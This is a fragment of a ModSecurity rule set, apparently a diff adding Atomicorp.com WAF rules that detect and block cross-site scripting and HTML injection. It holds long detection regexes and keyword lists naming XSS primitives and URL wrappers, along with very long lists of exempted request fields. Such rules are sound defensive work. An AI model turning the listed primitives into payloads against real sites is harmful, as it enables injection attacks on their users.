(?i)<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*(?:\W*?s\W*?c\W*?r\W*?i\W*?p\W*?t|\W*?f\W*?o\W*?r\W*?m|\W*?s\W*?t\W*?y\W*?l\W*?e|\W*?s\W*?v\W*?g|\W*?m\W*?a\W*?r\W*?q\W*?u\W*?e\W*?e|(?:\W*?l\W*?i\W*?n\W*?k|\W*?o\W*?b\W*?j\W*?e\W*?c\W*?t|\W*?e\W*?m\W*?b\W*?e\W*?d|\W*?a\W*?p\W*?p\W*?l\W*?e\W*?t|\W*?p\W*?a\W*?r\W*?a\W*?m|\W*?i?\W*?f\W*?r\W*?a\W*?m\W*?e|\W*?b\W*?a\W*?s\W*?e|\W*?b\W*?o\W*?d\W*?y|\W*?m\W*?e\W*?t\W*?a|\W*?i\W*?m\W*?a?\W*?g\W*?e?|\W*?v\W*?i\W*?d\W*?e\W*?o|\W*?a\W*?u\W*?d\W*?i\W*?o|\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s|\W*?s\W*?e\W*?t|\W*?a\W*?n\W*?i\W*?m\W*?a\W*?t\W*?e)[^>\w])|(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)(?:formaction|style|background|src|lowsrc|ping|on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)?|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|m(?:o(?:z(?:pointerlock(?:change|error)|(?:orientation|time)change|fullscreen(?:change|error)|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|u(?:ccess|spend|bmit)|peech(?:start|end)|ound(?:start|end)|croll|how)|b(?:e(?:for(?:e(?:(?:scriptexecu|activa)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|deactivate)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ime(?:update|out)|ransitionend|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom))[\s\x08]*?=" "id:342259,rev:126,severity:2,phase:2,deny,status:403,capture,t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,msg:'Atomicorp.com WAF Rules: Possible HTML Injection',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',log,auditlog"
+
+
+
+SecRule ARGS|ARGS_NAMES|!ARGS:/rules/|!ARGS:dt|!ARGS:/^utm_/|!ARGS:/^ADVERT_/|!ARGS:actionRemarks|!ARGS:ad|!ARGS:/submenu/|!ARGS:/area_id/|!ARGS:/snippet/|!ARGS:accesshash|!ARGS:/motd/|ARGS:cont|!ARGS:/comenter/|!ARGS:/contenu/|!ARGS:/background/|!ARGS:styles|!ARGS:/^go/|!ARGS:raw|!ARGS:/sig/|!ARGS:/overlay/|!ARGS:/ads?code/|!ARGS:AUTOR01|!ARGS:third_party_code|!ARGS:/partial/|!ARGS:/adsense/|!ARGS:/bericht/|!ARGS:/mensaje/|!ARGS:whereOptions|!ARGS:/wyswie/|!ARGS:/what/|!ARGS:opis|!ARGS:dims|!ARGS:/cbPay/|!ARGS:/social/|!ARGS:/__dnn/|!ARGS:/^system/|!ARGS:/pfield/|!ARGS:/go_code/|!ARGS:/app_list/|!ARGS:/^epp/|!ARGS:/^akID/|!ARGS:/shortcode/|!ARGS:/custom/|!ARGS:head|!ARGS:/_mail_/|!ARGS:tpl|!ARGS:/object/|!ARGS:export|!ARGS:/introcopy/|!ARGS:cont|!ARGS:/geodir/|!ARGS:omesg|!ARGS:/terms/|!ARGS:/google/|!ARGS:/pass/|!ARGS:code|!ARGS:/^custom/|!ARGS:tele|!ARGS:/color/|!ARGS:/center/|!ARGS:/widget/|!ARGS:/theme/|!ARGS:/^value/|!ARGS:/itinerary/|!ARGS:repair|!ARGS:nw_brief|!ARGS:/definition/|!ARGS:/subject/|!ARGS:process|!ARGS:/daten/|!ARGS:/Beschreibung/|!ARGS:/desc/|!ARGS:/destination/|!ARGS:ausgabe|!ARGS:eingabe|!ARGS:/included/|!ARGS:Lead|!ARGS:/training/|!ARGS:/Education/|!ARGS:/wp_autosave/|!ARGS:aname|!ARGS:datos|!ARGS:/^profile_/|!ARGS:return_to|!ARGS:ad|!ARGS:/overview/|!ARGS:/^mce_/|!ARGS:namestyle|!ARGS:/ULTIMATUM/|!ARGS:/agree/|!ARGS:/ARGS:uutinen/|!ARGS:tracklist|!ARGS:/artwork/|!ARGS:/gacode/|!ARGS:btnApply|!ARGS:/Button/|!ARGS:/^VALUE\[1\]$/|!ARGS:connectorPassword|!ARGS:sample|!ARGS:sotenson|!ARGS:/source_code/|!ARGS:/Settings/|!ARGS:code1|!ARGS:/promo/|!ARGS:view|!ARGS:record_json|!ARGS:/offer/|!ARGS:op|!ARGS:geweest|!ARGS:send|!ARGS:pressestimmen|!ARGS:name|!ARGS:imagemap|!ARGS:/^extra/|!ARGS:afbeelding|!ARGS:action_name|!ARGS:nieuwsbrief|!ARGS:/locatie/|!ARGS:ingredients|!ARGS:priceField|!ARGS:inhoud|!ARGS:f_main|!ARGS:error|!ARGS:komentar|!ARGS:uvod|!ARGS:/^field_/|!ARGS:customized|!ARGS:/fullnews/|!ARGS:vraag|!ARGS:/^textarea-video/|!ARGS:/_layout_/|!ARGS:/^FieldValue/|!ARGS:areacomum|!ARGS:lomake|!ARGS:vastaus|!ARGS:target|!ARGS:areaprivativa|!ARGS:areas|!ARGS:qti_data|!ARGS:templatecode|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/^help_/|!ARGS:quote|!ARGS:notice|!ARGS:userdata|!ARGS:source|!ARGS:/^book/|!ARGS:/leftcol/|!ARGS:mes|!ARGS:sisalto|!ARGS:reg_rules|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:json|!ARGS:wpreason|!ARGS:extended|!ARGS:/Kirjoitukset/|!ARGS:item_list|!ARGS:/x_line_item/|!ARGS:/^var_value/|!ARGS:valori|!ARGS:/rightcol/|!ARGS:/^instance/|!ARGS:/pimage/|!ARGS:/allowedTags/|!ARGS:/^zcck/|!ARGS:/includes/|!ARGS:/^button/|!ARGS:/accommodation/|!ARGS:/restaurant/|!ARGS:/^breves/|!ARGS:/testimonial/|!ARGS:feature|!ARGS:headstone|!ARGS:/formcode/|!ARGS:/log/|!ARGS:/metatags/|!ARGS:/^customfield/|!ARGS:/^fields/|!ARGS:/embed/|!ARGS:val333|!ARGS:/banner/|!ARGS:/synopsis/|!ARGS:cb_talks|!ARGS:log|!ARGS:/^bt_|!ARGS:/next/|!ARGS:changedept|!ARGS:receipt_address|!ARGS:narrative|!ARGS:/results/|!ARGS:/teaser/|!ARGS:EnTrar|!ARGS:cv|!ARGS:dati|!ARGS:/experience/|!ARGS:/plan/|!ARGS:do|!ARGS:properties|!ARGS:/para/|!ARGS:do|!ARGS:perex|!ARGS:/highlight/|!ARGS:/bio/|!ARGS:/short/|!ARGS:advanced|!ARGS:/contact/|!ARGS:/google_analytics/|!ARGS:review|!ARGS:rules|!ARGS:meta|!ARGS:/observacao/|!ARGS:/caption/|!ARGS:/feed/|!ARGS:/bbclosed/|!ARGS:logoutRequest|!ARGS:video1|!ARGS:/js_payload/|!ARGS:/abstract/|!ARGS:pc_main|!ARGS:/^property/|!ARGS:/notice/|!ARGS:/config/|!ARGS:/welcome/|!ARGS:des|!ARGS:pwd|!ARGS:structure|!ARGS:/tweet/|!ARGS:/table/|!ARGS:tag|!ARGS:ad_code|!ARGS:romancode|!ARGS:model|!ARGS:thecode|!ARGS:rqst|!ARGS:/^input_/|!ARGS:dhltrack|!ARGS:reflection|!ARGS:media|!ARGS:blurb|!ARGS:Thankyou|!ARGS:/OSDCS/|!ARGS:continue|!ARGS:do|!ARGS:waarde|!ARGS:img_alt|!ARGS:notes|!ARGS:drugs|!ARGS:/writing/|!ARGS:terms|!ARGS:/announ/|!ARGS:highlights|!ARGS:/^eeta-/|!ARGS:profile|!ARGS:/^prod/|!ARGS:/^News/|!ARGS:request|!ARGS:copy|!ARGS:/MapField/|!ARGS:/email/|!ARGS:main|!ARGS:/admin/|!ARGS:/suffix/|!ARGS:/prefix/|!ARGS:validatepromo|!ARGS:payment_sel|!ARGS:/title/|!ARGS:/submit/|!ARGS:contenu|!ARGS:/xjxargs/|!ARGS:block|!ARGS:btnCheckout|!ARGS:nav|!ARGS:/instructions/|!ARGS:/info/|!ARGS:recompose|!ARGS:compose|!ARGS:/^bname/|!ARGS:groupWelcomeScreen|!ARGS:langbericht|!ARGS:next|!ARGS:xsym_sym_brief|!ARGS:creategallery|!ARGS:/^copyright/|!ARGS:lease|!ARGS:livezillacode|!ARGS:cleaning|!ARGS:/^gui/|!ARGS:/Import_Cell/|!ARGS:/reply/|!ARGS:/^bbcode/|!ARGS:subhead|!ARGS:_cc|!ARGS:resume|!ARGS:addtoclass|!ARGS:/intro/|!ARGS:/answer/|!ARGS:registration_prices|!ARGS:registration_discounts|!ARGS:venue|!ARGS:/opportunit/|!ARGS:agenda|!ARGS:workshop|!ARGS:/^mainman/|!ARGS:features|!ARGS:/problem/|!ARGS:/question/|!ARGS:entry|!ARGS:/form/|!ARGS:/qualification/|!ARGS:/detail/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/script/|!ARGS:/^product/|!ARGS:/report/|!ARGS:/^room_/|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:/^site_/|!ARGS:/translation/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:/embed/|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:/^_qf_/|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:/solution/|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:/pagimenu/|!ARGS:/^jms/|!ARGS:/note/|!ARGS:Post|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/_section_/|!ARGS:/css/|!ARGS:/^prop_/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/|!ARGS:/tagline/|!ARGS:/senior/|!ARGS:/^addon/ "(?:> ?< ?(?:img ?src|a ?href) ?= ?(?:ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<|> ?\"? ?(?:>|<)|< ?/?i?frame|^\"\>|\' ?\} ?\) ?;)"  "chain,phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:replaceNulls,t:compressWhiteSpace,t:lowercase,id:350147,rev:168,severity:2,msg:'Atomicorp.com WAF Rules: Potentially Untrusted Web Content Detected'"
+SecRule MATCHED_VARS "!@rx ((?:submit(?:\+| )?(request)?(?:\+| )?>+|<<(?:\+| )remove|(?:sign ?in|log ?(?:in|out)|next|modifier|envoyer|add|continue|weiter|account|results|select)(?:\+| )?>+)$|^< ?\??(?: |\+)?xml|^<samlp|^>> ?$)"  "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase"
+
+SecMarker END_XSS_ATTACKS_D1
+
+SecRule REQUEST_HEADERS:REFERER|REQUEST_URI "(?:/plugins/editors/tinymce/jscripts/|/modules/tinymce/tinymce/jscripts|/phpinfo_iframe\.php|^pagead[0-9]\.googlesyndication\.com/pagead/|/wp-admin/press-this\.php|&(?:loc|u)='https?://|^/[a-z0-9/]+?\?fl_builder)"  "phase:2,nolog,noauditlog,id:343732,pass,t:none,t:urlDecodeUni,t:lowercase,skipAfter:END_XSS_ATTACKS_D2"
+
+#XSS in referrer
+SecRule REQUEST_HEADERS:REFERER "(?:= ?\' ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|< ?(?:script|about|applet|activex|chrome)|activexobject|(?:\.add|\@)import|asfunction\:|background-image\:|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|<input|\b(?:java|vb|live|j|e(?:cma|exec))script\b ?>|lowsrc ?=|mocha\:|<{1,200}.\bon(?:abort|blur|change|click|dragdrop|event|focus|keydown|move|resize|select|submit|unload|key(?:press|up)|load|mouse(?:down|move|out|over|up))\b|settimeout|shell:|< ?i(?:mg|frame) ?src ?=( |\+)?(?:\"|\')?(ht|f)tps?:/)" "phase:2,deny,log,auditlog,status:403,capture,id:340158,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,rev:20,severity:2,msg:'Atomicorp.com WAF Rules: XSS in referrer',logdata:'%{TX.0}'"
+SecMarker END_XSS_ATTACKS_D2
+
+#special exclusion for drupal webforms
+SecRule REQUEST_URI "node/[0-9]+/webform/components/" "phase:2,deny,log,auditlog,status:403,capture,chain,t:none,t:urlDecodeUni,t:lowercase,id:320476,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"
+SecRule REQUEST_URI|ARGS|!ARGS:/^extra/|!ARGS:op|!ARGS:/desc/|!ARGS:areas|!ARGS:templatecode|!ARGS:value[value]|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:quote-form|!ARGS:value|!ARGS:paepdc|!ARGS:/VB_announce/|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:search_theme_form_keys|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/desc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/header/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:text|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|\be(?:cma|xec)script\b|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc ?=|mocha\:|\bon(?:abort|blur|change|click|select|dragdrop|event|focus|keydown|keypress|keyup|mouse(?:down|move|out|over|up))\b|shell\:|window\.location|asfunction:_root\.launch|\%env)"  "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase"
+
+
+#Rule 340152: IE XSS attack
+#SecRule REQUEST_URI_RAW|REQUEST_BODY "(?:< ?object[ /+\t].*?((type)|(codetype)|(classid)|(code)|(data))[ /+\t]*=|< ?applet[ /+\t].*?code[ /+\t]*=|< ?base[ /+\t].*?href[ /+\t]*=|)" "phase:2,t:none,t:lowercase,log,auditlog,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack (IE variant)',id:340152,rev:24"
+
+
+SecMarker END_XSS_ATTACKS
+
+SecRule REQUEST_URI|REQUEST_HEADERS|REQUEST_BODY|ARGS|QUERY_STRING|!ARGS:areas|!ARGS:templatecode "@pm script expression html onevent onmouse img src onload onerror import asfunction: background-image: fromcharcode frame input lowsrc mocha onblur onselect onchange onclick ondragdrop onkeydown onkeypress onkeyup resize select unload shell: settimeout addimport @import url window.location < > env about applet activex chrome getparentfolder getspecialfolder href object" "id:333841,phase:2,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,multimatch,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334388,t:none,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_2"
+
+#special exclusion for drupal webforms
+SecRule REQUEST_URI "^/node/[0-9]+/webform/components/" "phase:2,deny,log,auditlog,status:403,chain,capture,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:320475,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"
+SecRule REQUEST_URI|ARGS|!ARGS:areas|!ARGS:templatecode|ARGS_NAMES|!ARGS:/desc/|!ARGS:value|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:/^value/|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|(?:alert|document\.write) ?\(|<? (?:(?:java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<|> ?\"? ?>|< ?/?i?frame|\%env)"  "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,multiMatch"
+
+# Rule 340148:  XSS injection with multimatch checks
+#XSS generic filter and suspicious web code detector
+SecRule REQUEST_URI  |!ARGS:/^aftax/|"!(?:/(?:admin/(?:(?:build(?:/translate|/language/edit|/edit)?|catalog_category)/|settings/site-information|catalog/edit)|(?:miadmin/catalog_product|sitebuilder)/|wizard/edit/html|node/add/|filter-xss)|\/(?:admin\/(?:surveys\/[0-9]+\/edit\/|\?page=spageedit)|node\/[0-9]+\/(?:webform\/components\/|edit|clone))|^(?:\/\?(?:q=node\/[0-9]+\/edit|(s|v))|\?(s|v))|c=myaccount&m=update_profile$|mt\.cgi|/nav\.php\?nav=addnews|/products\.php\?action=(?:edit|update)|/systemadmin/configproducts\.php|/admin/catalog_product/|/index\.php\?tab=admincatalog|/admin/settings/customerror|^/ndxz-?studio/\?a=|/editform\?|/wizard/edit/|\?tab=admin|\?content=admin|\?action=modif|\?exec=articles_edit$|/admin/preview\.php|/sysext/tstemplate/|/site-builder/|/(?:new|edit)/[0-9]+/(?:confirm|add)|/admin/editform|/cms/admin/editform|^/filemanager/filemanager\.php|^/([a-z]+/)?admin/structure/|^/index.php/admin/system_config/|^/administrator/\?option=com_civicrm|^/za/zcadm|^/blog/roller-ui/authoring/entryedit|^/admin/(?:p(?:age_save|roduct_groups/edit/)|[a-z]+/[0-9]+/)|^/services?/bmwidget\.json|^/file/ajax/|^/manage/car/[a-z0-9]+/|^/[a-z0-9/]+?\?fl_builder|^/index\.php\?route=extension/d_quickcheckout/[a-z0-9_]+/update|^/[a-z0-9]+?/?admin[a-z0-9]+?/index\.php\?controller=admin|^/wp-admin/edit\.php\?post_type=event&page=events-manager-options)" "id:333842,rev:4,phase:2,t:none,t:lowercase,t:urlDecodeUni,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334389,t:none,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D2"
+#Filenames
+SecRule REQUEST_FILENAME "!(/file-manager/edit/)" "id:366841,phase:2,t:none,t:lowercase,t:urlDecodeUni,pass,nolog,noauditlog,skip:1,rev:2"
+        SecAction "phase:2,id:336688,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D2"
+
+SecRule REQUEST_URI "^/index\.php\?ajax-proxy/" "id:321115,rev:1,phase:2,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_2"
+
+# Rule 340148:  XSS injection with multimatch checks
